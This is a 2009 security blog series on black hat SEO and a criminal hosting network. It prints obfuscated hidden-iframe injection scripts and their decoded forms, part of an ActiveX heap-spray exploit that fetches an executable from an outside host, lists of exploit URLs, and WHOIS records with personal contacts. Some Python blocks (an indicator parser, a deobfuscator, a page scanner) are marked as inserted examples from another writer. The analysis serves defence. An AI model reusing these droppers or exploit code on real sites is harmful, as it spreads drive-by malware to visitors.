Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 31-mar-2009
Creation Date: 30-jun-2008
Expiration Date: 30-jun-2010

Domain Name: dasretokfin.com
Registrar: REGTIME LTD.
Whois Server: whois.regtime.net
Referral URL: http://www.webnames.ru
Name Server: NS1.AFRAID.ORG
Name Server: NS2.AFRAID.ORG
Name Server: NS3.AFRAID.ORG
Name Server: NS4.AFRAID.ORG
Status: ok
Updated Date: 24-mar-2009
Creation Date: 18-feb-2009
Expiration Date: 18-feb-2010

Domain Name: tochtonenado.com
Registrar: UK2 GROUP LTD.
Whois Server: whois.hostingservicesinc.net
Referral URL: http://www.uk2group.com/
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Status: clientTransferProhibited
Updated Date: 25-mar-2009
Creation Date: 25-mar-2009
Expiration Date: 25-mar-2010

domain: bizoplata.ru
type: CORPORATE
nserver: ns1.sevensearchon.ru
nserver: ns2.sevensearchon.ru
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 0000000
e-mail: tuhov83@mail.ru
registrar: CT-REG-RIPN
created: 2009.01.23
paid-till: 2010.01.23
source: TC-RIPN

domain: startdontstop.ru
type: CORPORATE
nserver: ns1.sevensearchon.ru.
nserver: ns2.sevensearchon.ru.
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 916 7843219
e-mail: ale32888049@yandex.ru
registrar: NAUNET-REG-RIPN
created: 2009.04.14
paid-till: 2010.04.14
source: TC-RIPN

Friday, April 17, 2009

Black Hat SEO - RBN Hacks, p.3

The silent threat: Black Hat SEO, exploits, hacks, botnets

Triple threats

READ THIS page if you need more information

WARNING: All sites listed on this page are dangerous (live URLs with exploits)
which lead to trojans being automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)

The story about "Hosted JavaScript leading to .cn PDF Malware", which has implicated clarafin[.]info, fabiomotor[.]cn and letomerin[.]cn, continues!

New sites appear as intermediaries for distributing malware.


For beebest[.]cn I will take the domain "cmizziconstruction.com" as an example.

The Diagnostic page for cmizziconstruction.com. (Provided by Google Safe Browsing)

In the source code we can see:

<script>function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d
2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534()
));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){
var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49
d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43<
h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647
24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst
r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36=''
;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628
216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+
r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027
'+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366
5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+'
332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+
'342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253
7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36
+'392532652536332536662536642532662536392536652532652537'+r36+'302
536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34
2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346
42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536
6625366425323825323925326125333425333125333125333325333825323925
3262253237'+r36+'253334253338253336253338253636253336253336253237'
+r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364
253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363
82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+'
342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253
7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925
3361253638253639253634253634253635253665253237'+r36+'253365253363
2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29
293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27
'+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3
64714d7(h49d2e36474be1));</script>

The deobfuscated code is

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f%6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%20%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d%31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

which is an IFRAME

<iframe name=c27 src='hxxp://extraspray.com/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe>

Analysis on March 25

hxxp://extraspray.com/in.php?
URL Analysis
hxxp://agkt.info/evo/getexe.exe
?o=7&t=1238025784&i=2154770527&e=
 
hxxp://agkt.info/evo/exploits/x19.php
?o=7&t=1238025784&i =2154770527
 
hxxp://agkt.info/evo/exploits/x18.php
?o=7&t=1238025784&i=2154770527
 
hxxp://agkt.info/evo/exploits/x21x1.php
 
hxxp://agkt.info/evo/getexe.exe
?o=4&t=1238025787&i=2154770527&e=
 
hxxp://rifnasax.cn/nuc/exe.php - URL Analysis - VirusTotal (Kryptik)

Analysis on April 17

hxxp://extraspray.com/in.php?
URL Analysis
hxxp://sgqw.info/evo/getexe.exe
?o=7&t=1239978315&i=2154770527&e=
 
hxxp://sgqw.info/evo/exploits/x19.php
?o=7&t=1239978315&i=2154770
 
hxxp://sgqw.info/evo/exploits/x18.php
?o=7&t=1239978315&i=2154770527
URL Analysis - VirusTotal - Anubis
hxxp://sgqw.info/evo/getexe.exe
?o=7&t=1239978315&i=2154770527&e=18
URL Analysis - VirusTotal - Anubis


Now with clarafin[.]info

Analysis on April 17 (07:26)

The source code shows:

<script>
if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33%32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c%61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61%66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29%2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20%77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%74%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}
var myia = true;
</script>

which is the IFRAME for clarafin[.]info

<iframe name=c32 src='hxxp://clarafin.info/traff/index.php?'+Math.round(Math.random()*253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'></iframe>

You can follow the result for "clarafin.info" on this page:
Internet Storm Center: Hosted javascript leading to .cn PDF malware

-------------

And now a new one that has just appeared on the same page: beebest[.]cn

Google Diagnostic for beebest.cn - AS41665 (HOSTING)

This is just a part of the code:

function ss()
{
try{
ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");
var arbitrary_file = "hxxp://beebest.cn/dlutrl23dnwfas/exe.php";
var dest = 'C:/Program Files/Outlook Express/wab.exe';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
attack.SnapshotPath = arbitrary_file;
setTimeout('window.location = "ldap://127.0.0.1"',3000);
attack.CompressedPath = dest;
attack.PrintSnapshot(arbitrary_file,dest);
}catch(e){}
}
function xml()
{
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);

memory = new Array();
for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }
document.getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><!


hxxp://beebest.cn/dlutrl23dnwfas/index.php
URL Analysis
hxxp://beebest.cn/dlutrl23dnwfas/spl/pdf.pdf
URL Analysis
hxxp://beebest.cn/dlutrl23dnwfas/exe.php
VirusTotal - Anubis


A ThreatExpert result shows the connection to stopgam.cn and
stopgam2.cn after infection

ThreatExpert Result




It's recommended that you block these IPs using your hosts file or your firewall.

These domains are also cited on Malware Domain List: 91.212.65.7, and all are still active.

hxxp://beebest.cn - 78.109.25.215
hxxp://clarafin.info - 212.5.74.37
hxxp://corpamata.cn - 78.109.25.215
hxxp://extraspray.com - 72.232.116.51
hxxp://agkt.info
hxxp://rifnasax.cn - 91.212.65.7
hxxp://sgqw.info - 85.17.136.137
hxxp://stopgam.cn - 85.17.136.137
hxxp://stopgam2.cn - 174.129.244.106 / 174.129.241.185
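A caveat on the blocking advice above: a hosts file only short-circuits name resolution, so it stops the domains but does nothing against a connection made straight to one of the bare IP addresses; those need a firewall rule. The Python below is an added example, not code from this blog or from Malware Domain List: it takes the defanged list as written here, refangs it, validates every IPv4 address, and emits a hosts block for the names plus outbound block rules for the addresses. The indicator text is transcribed from the list above (with one constructed bracket-defanged line to show refanging); the netsh advfirewall syntax is the standard Windows Vista/2008-and-later command and is an assumption about the reader's tooling.

```python
import ipaddress
import re

# Transcribed from the list above, defanged as on the page; agkt.info is
# listed without an address.  The last line is a constructed duplicate in
# bracket-defanged form so that refanging is exercised too.
INDICATORS_FROM_PAGE = """
hxxp://beebest.cn - 78.109.25.215
hxxp://clarafin.info - 212.5.74.37
hxxp://corpamata.cn - 78.109.25.215
hxxp://extraspray.com - 72.232.116.51
hxxp://agkt.info
hxxp://rifnasax.cn - 91.212.65.7
hxxp://sgqw.info - 85.17.136.137
hxxp://stopgam.cn - 85.17.136.137
hxxp://stopgam2.cn - 174.129.244.106 / 174.129.241.185
stopgam2[.]cn
"""

# hxxp:// or http:// URLs: the host is captured, the path is discarded.
URL_RE = re.compile(r"h[xt]{2}ps?://([^/\s]+)\S*", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Bare domains, with or without [.] defanging, ending in an alphabetic TLD.
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\[?\.\]?)+[a-z]{2,}\b", re.IGNORECASE)


def refang(token: str) -> str:
    """Undo the [.] / (.) defanging conventions and normalise case."""
    return token.replace("[.]", ".").replace("(.)", ".").lower()


def parse_indicators(text: str):
    """Return (sorted domains, sorted valid IPv4 addresses) from a defanged list."""
    domains, ips = set(), set()
    for line in text.splitlines():
        # Reduce each URL to its host so that a path such as /in.cgi
        # is never mistaken for a domain name.
        line = URL_RE.sub(lambda m: " %s " % m.group(1), line)
        for token in IPV4_RE.findall(line):
            try:
                ips.add(str(ipaddress.IPv4Address(token)))
            except ipaddress.AddressValueError:
                pass  # an octet above 255 is a typo, not an indicator
        for token in DOMAIN_RE.findall(line):
            domains.add(refang(token))
    return sorted(domains), sorted(ips, key=ipaddress.IPv4Address)


def hosts_block(domains, sink: str = "0.0.0.0") -> str:
    """hosts-file lines.  These defeat name resolution only; traffic sent
    directly to an IP address is unaffected, hence firewall_rules() below."""
    lines = ["# rogue antivirus / black hat SEO domains from the list above"]
    lines += ["%s %s" % (sink, d) for d in domains]
    return "\n".join(lines) + "\n"


def firewall_rules(ips) -> list:
    """Outbound block rules for the bare addresses.  Windows netsh advfirewall
    syntax is assumed here; translate for iptables or pf as needed."""
    return ['netsh advfirewall firewall add rule name="block %s" '
            'dir=out action=block remoteip=%s' % (ip, ip) for ip in ips]


if __name__ == "__main__":
    doms, addrs = parse_indicators(INDICATORS_FROM_PAGE)
    print(hosts_block(doms))
    print("\n".join(firewall_rules(addrs)))
```

The address validation matters because lists like this are copied by hand: an octet above 255 or a fused "domainIP" token is a transcription error, and a hosts entry pointing at the wrong name silently blocks nothing.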


78.109.25.217

IP Location - Namibia - Plathost2 - Ivan Kirst

Domain Name: beebest.cn - stopgam.cn - corpamata.cn
Domain Status: ok
Registrant Organization: DomainsC
Registrant Name: MichellGregory
Administrative Email: abuse@domainsreg.cn
Sponsoring Registrar: 厦门华融盛世网络有限公司 -
Xiamen Huarong Spirit Network Limited
Name Server: ns1.us.editdns.net
Name Server: ns2.us.editdns.net
Name Server: ns3.us.editdns.net
Registration Date: 2009-02-11
Expiration Date: 2010-02-11

212.5.74.37

IP Location - Russia

Domain Name: clarafin.info
Domain Status: ok
Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd
Name Server: ns1.us.editdns.net
Name Server: ns2.us.editdns.net
Name Server: ns3.us.editdns.net
Registration Date: 2009-03-18
Expiration Date: 2010-03-18

85.17.136.137

IP Location - Netherlands - LeaseWeb

Domain Name: sgqw.info
Domain Status: ok
Registrant Organization: Private person
Registrant Name: Sumir Mahadjan
Administrative Email: mahadjans9@gmail.com
Sponsoring Registrar: Regtime Ltd. (R455-LRMS)
Name Server: ns1.mtpv.info
Name Server: ns2.mtpv.info
Name Server: ns3.us.editdns.net
Registration Date: 2009-04-01
Expiration Date: 2010-01-01

72.232.116.51

IP Location - US - Layered Technologies, Inc.

Domain Name: extraspray.com
Domain Status: ok
Registrant Organization: Private person
Registrant Name: Sumir Mahadjan
Administrative Email: mahadjans9@gmail.com
Sponsoring Registrar: Regtime Ltd.
Name Server: vc11.amhost.net
Name Server: vc12.amhost.net
Registration Date: 2009-03-09
Expiration Date: 2010-03-09

174.129.244.106
174.129.241.185

IP Location - US - Amazon.com, Inc.

Domain Name: stopgam2.cn
ROID: 20090417s10001s12986159-cn
Domain Status: clientTransferProhibited
Registrant Name: Zitoclick
Administrative Email: support@zitoclick.com
Sponsoring Registrar: InamePro dba Dynadot
Name Server: ns1.dsredirection.com
Name Server: ns2.dsredirection.com
Registration Date: 2009-04-17 05:23
Expiration Date: 2010-04-17 05:23

91.212.41.119

Domain Name: tixwagoq.cn
Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. Hangzhou
Registrant Name: 周明 - Zhou
Administrative Email: suhalbuia@163.com
Sponsoring Registrar: 易名中国 - Easy Chinese
Name Server: ns1.runsdns.cn
Name Server: ns2.runsdns.cn
Registration Date: 2009-03-18 22:16
Expiration Date: 2010-03-18 22:16

inetnum: 91.212.41.0 - 91.212.41.255
netname: gaztranzitstroyinfo-net
descr: LLC "Gaztransitstroyinfo"
country: Russia
------------

91.212.65.7

IP Location - Ukraine - Eurohost LLC

Domain Name: rifnasax.cn
Registrant Organization: Yong also Import and Export Corporation
Registrant Name: 张龙 - Long
Administrative Email: alvin_555@yeah.net
Sponsoring Registrar: 易名中国 - Easy Chinese
Name Server: ns2.dnsmytruedns.com
Name Server: ns1.dnsmytruedns.com
Registration Date: 2009-02-13 19:29
Expiration Date: 2010-02-13 19:29

This IP appears to host several websites with live exploits.

91.212.65.7

hxxp://dnsmytruedns.com
hxxp://hayboxiw.cn (Analysis)
hxxp://paksusic.cn
hxxp://paylayos.cn
hxxp://peskufex.cn
hxxp://porgacig.cn
hxxp://qicdator.cn (Analysis)
hxxp://ralcofic.cn
hxxp://rifnasax.cn (Analysis)
hxxp://tozxiqud.cn

91.212.41.119

hxxp://tixwagoq.cn/in.cgi?6 (Analysis)


Thursday, April 9, 2009

Black Hat SEO - RBN Hacks, p.2

The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed

Welcome to LuckySploit:) ITS TOASTED

READ THIS page if you need more information


WARNING: All sites listed on this page are dangerous (live URLs with exploits) which lead
to trojans being automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)


A nice article provided by Finjan about the LuckySploit toolkit, one of the
latest script-kiddie toolkits that cyber criminals are using these days, can be found
by following this link: LuckySploit Toolkit Exposed

Using a well-known technique such as "code obfuscation", most often used to
hide the script's real intent (the obfuscation is sometimes randomly generated), here is one of the
numerous malicious scripts found on several compromised websites.

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c102916999516l4963660743084(l4963660743855){
var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}
function l4963660744fc7(l4963660745797){
function l4963660746f0b(){return 2;}
var l4963660745f69='';
l4963660747eab=String.fromCharCode;
for(l4963660746738=0;l4963660746738<l4963660745797.length;
l4963660746738+=l4963660746f0b()){
l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(
l4963660745797.substr(l4963660746738,l4963660746f0b()))));}
return l4963660745f69;}
var x60='';
var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60
+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x
60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+
'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+
x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+
'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+
'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+
'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+
'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+
'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+
x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+
x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+
x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+
x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+
'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+
x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+
'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+
x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+
'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+
'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+
x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+
'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));
</script>

The deobfuscated result is:

<script>
if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}
var myia=true;
</script>

and then loads the IFRAME:

<iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe>
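The c27 (extraspray.com), c32 (clarafin.info) and c10 (gogo2me.net) droppers shown on this page all use the same two-layer scheme: a hex string chopped into quoted fragments and spliced with an empty junk variable (r36 in the earlier post, x60 here), decoded with parseInt(pair, 16) and String.fromCharCode, which yields a script that document.write()s an unescape()d hidden IFRAME. The Python decoder below is an added example, not code from this blog or from any of the analysis services it links; it peels both layers offline and reports the IFRAME src defanged. The percent-encoded payload in it is the one shown above; the build_hex_splice_fixture helper is a constructed test input that lays that payload out in the stage-1 shape so the decoder can be exercised end to end. The junk-variable name is irrelevant to the decoder because it simply joins every quoted hex fragment.

```python
import re

# Stage 1 on the page: '3C736'+x60+'3726'+... where x60 is ''.  The
# fragments are not pair-aligned, so they must be joined before pairing.
HEX_FRAGMENT_RE = re.compile(r"'([0-9A-Fa-f]*)'")

# Stage 2 on the page: document.write(unescape('%3c%69...'))
UNESCAPE_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)")
ESCAPE_SEQ_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# Stage 3: the hidden IFRAME that document.write() emits.
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc=['\"]?([^'\" >]+)", re.IGNORECASE)

# The decoded script from this post (percent payload copied from above).
STAGE2_SCRIPT_FROM_PAGE = (
    "<script>if(!myia){document.write(unescape('"
    "%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27"
    "%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f"
    "%2f%63%68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%34%39"
    "%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%65%3d%27%76%69%73"
    "%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61"
    "%6d%65%3e'));}var myia=true;</script>"
)


def join_hex_fragments(js_source: str) -> str:
    """Concatenate every quoted hex fragment; the '+x60+' splices vanish."""
    return "".join(HEX_FRAGMENT_RE.findall(js_source))


def decode_hex_pairs(hex_string: str) -> str:
    """parseInt(pair, 16) + String.fromCharCode, as the page's decoder does."""
    if len(hex_string) % 2:
        raise ValueError("odd-length hex payload: a fragment was cut or lost")
    return bytes.fromhex(hex_string).decode("latin-1")


def js_unescape(text: str) -> str:
    """Port of JavaScript unescape(): handles %XX and the %uXXXX form used
    by the heap-spray strings elsewhere on this page."""
    return ESCAPE_SEQ_RE.sub(
        lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_unescape_payload(script: str) -> str:
    m = UNESCAPE_RE.search(script)
    if not m:
        raise ValueError("no unescape('...') payload found")
    return js_unescape(m.group(1))


def defang(url: str) -> str:
    """Write URLs the way this page does (hxxp) so they are not clickable."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)


def deobfuscate(js_source: str) -> str:
    """Stage 1 (hex splice) -> stage 2 (unescape) -> the HTML actually written."""
    stage2_script = decode_hex_pairs(join_hex_fragments(js_source))
    return decode_unescape_payload(stage2_script)


def extract_iframe_sources(html: str) -> list:
    """Defanged src of every IFRAME; a JS-concatenated src (the c27/c32
    cache-busting random suffix) yields its static prefix."""
    return [defang(src) for src in IFRAME_SRC_RE.findall(html)]


def analyse(js_source: str) -> list:
    return extract_iframe_sources(deobfuscate(js_source))


def build_hex_splice_fixture(script: str, junk: str = "x60", chunk: int = 5) -> str:
    """Constructed test input only: lay `script` out in the page's stage-1
    shape (odd-length hex fragments spliced with an empty junk variable)."""
    hex_string = script.encode("latin-1").hex().upper()
    fragments = [hex_string[i:i + chunk] for i in range(0, len(hex_string), chunk)]
    return "var %s='';var payload='%s';" % (junk, ("'+%s+'" % junk).join(fragments))


if __name__ == "__main__":
    sample = build_hex_splice_fixture(STAGE2_SCRIPT_FROM_PAGE)
    print(deobfuscate(sample))
    print(analyse(sample))
```

Running the same functions on a live sample means pasting the `var ...='3C73...'` statement itself, never executing the script: the alert() call the attackers left in their own decoder is exactly why these samples are usually analysed in a sandbox instead. The odd-length check is the practical guard against a fragment that a line wrap has cut in two.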

Note that searching for the script found in the second redirection turns up a lot of discussion referring
to different IPs or hacking problems (injected IFRAMEs): Google search for "if(!myia)" iframe


An example of a site on the same IP:

gogo2me.net resolves to 94.247.2.157 [hs.2-157.zlkon.lv]

and then loads an IFRAME (with LuckySploit):

hxxp://94.247.2.157/.dif/go.php?sid=1
hxxp://94.247.2.157/.lck/?t=3
hxxp://94.247.2.157/.lck/?t=6
hxxp://94.247.2.157/.lck/?90f6ff8e287ae123...
hxxp://94.247.2.157/.lck/?75c4a0ecf4a4836...

Wepawet Analysis

A ThreatExpert analysis also indicates the relationship with these viruses/malware:

Zlob variant (Trojan-Spy.Win32.Zbot), keylogger's trojan (Trojan-Spy.Zbot.YETH) and some
TDSS (Alias Alureon) variant Win32.Fasec [Ikarus]


And here I just show you the line :) Also note the use of the RSA algorithm (screenshot)

nextkey = '';
k = '';
attack_level = 0;
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';
} catch (e){
}








 

Black Hat SEO - RBN Hacks, p.1

The silent threat: Black Hat SEO, exploits, hacks, botnets

Inspecting the bad network

READ THIS page if you need more information

WARNING: All sites listed on this page are dangerous (live URLs with exploits)
which lead to trojans being automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)


If you want information about disinfection, check out this page:
Analysis of a website infected with a hidden iframe (by NoVirusThanks)

This does not cover the disinfection of your own website (if it was attacked and iframed).

For that, change your passwords (Windows passwords, FTP, email, database
access, etc.) and remove the content injected into each page as quickly as possible
(contact your hosting provider for assistance).

This page references domains found in thousands of compromised websites through
injected obfuscated JavaScript code (IFRAME).
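For site owners checking whether their own pages carry one of these injections before cleaning them, the following Python scanner is an added example, not code from this blog or from NoVirusThanks. Its signatures are taken from the scripts shown on this page: an IFRAME with visibility:hidden or a 1x1 size, document.write(unescape(...)), a parseInt(...,16) hex decoder, the if(!myia) guard, and the in.cgi?<keyword> redirector. The two sample pages inside it are constructed, not real infected files; the file suffix list is an assumption about a typical PHP web root.

```python
import re
import sys
from pathlib import Path

# Signatures drawn from the injected scripts shown on this page.
SIGNATURES = [
    ("hidden iframe",
     re.compile(r"<iframe\b[^>]*(?:visibility\s*:\s*hidden"
                r"|\b(?:width|height)=['\"]?[01]['\"]?(?=[\s>]))",
                re.IGNORECASE)),
    ("document.write(unescape(...)) dropper",
     re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.IGNORECASE)),
    ("parseInt(...,16) hex decoder",
     re.compile(r"parseInt\s*\([^)]*,\s*16\s*\)")),
    ("if(!myia) marker",
     re.compile(r"if\s*\(\s*!\s*myia\s*\)")),
    ("in.cgi?<keyword> redirector",
     re.compile(r"/in\.cgi\?\w+", re.IGNORECASE)),
]

# Constructed samples (not real files): one page carrying the injection
# pattern from this post, one clean page with a legitimate embed.
SAMPLE_INFECTED_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>if(!myia){document.write(unescape('%3c%69%66%72'));}var myia=true;</script>
</body></html>
"""
SAMPLE_CLEAN_PAGE = """<html><body>
<iframe src='https://www.youtube.com/embed/placeholder' width='560' height='315'></iframe>
<script>document.write('<p>' + new Date() + '</p>');</script>
</body></html>
"""


def scan_text(text: str) -> list:
    """Return sorted (line_number, signature_name) pairs for every hit."""
    hits = set()
    for name, pattern in SIGNATURES:
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            hits.add((line_no, name))
    return sorted(hits)


def scan_tree(root, suffixes=(".html", ".htm", ".php", ".js", ".tpl")) -> dict:
    """Walk a web root and map each suspicious file to its hits, so the
    injected lines can be located and removed file by file."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for file_name, hits in scan_tree(sys.argv[1]).items():
            print(file_name, hits)
    else:
        print("infected sample:", scan_text(SAMPLE_INFECTED_PAGE))
        print("clean sample:", scan_text(SAMPLE_CLEAN_PAGE))
```

The hidden-IFRAME rule fires on the legitimate-looking placeholder too, which is the intended behaviour: a 1x1 or invisible frame has no honest use on a content page, and the line number lets the owner go straight to the injected text the post tells them to remove.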


The Zlkon network (DATORU EXPRESS SERVISS) has been cited in several blogs
for hosting malicious content for cyber criminals, for example:

On the Symantec website for spreading the TDSS trojan [hs.2-104.zlkon.lv], in conjunction
with IPs at UkrTeleGroup Ltd. in December 2008

85.255.115.156
85.255.112.87
85.255.115.50
85.255.112.154

On the msmvps' blog for inaccurate whois details in January 2009
On the bluetack.co.uk forum for rogue antivirus, here, in January 2009
Another example with "Total Defender", another rogue antivirus, here
Also found on several websites including FireEye's "Bad Actors Part 2 - ZlKon"
- Dancho Danchev's blog
Related network cited here: Bad, bad, cybercrime-friendly ISPs!




A quick look at two IPs at Zlkon in Latvia


94.247.3.152 [hs.3-152.zlkon.lv]

Using the DNS servers

ns1.freednshostserver.com [78.109.18.234]
ns1.freednshostserver.com [78.109.18.235]

descr: Datacenter Hosting.UA
route: 78.109.16.0/20
origin: AS41665

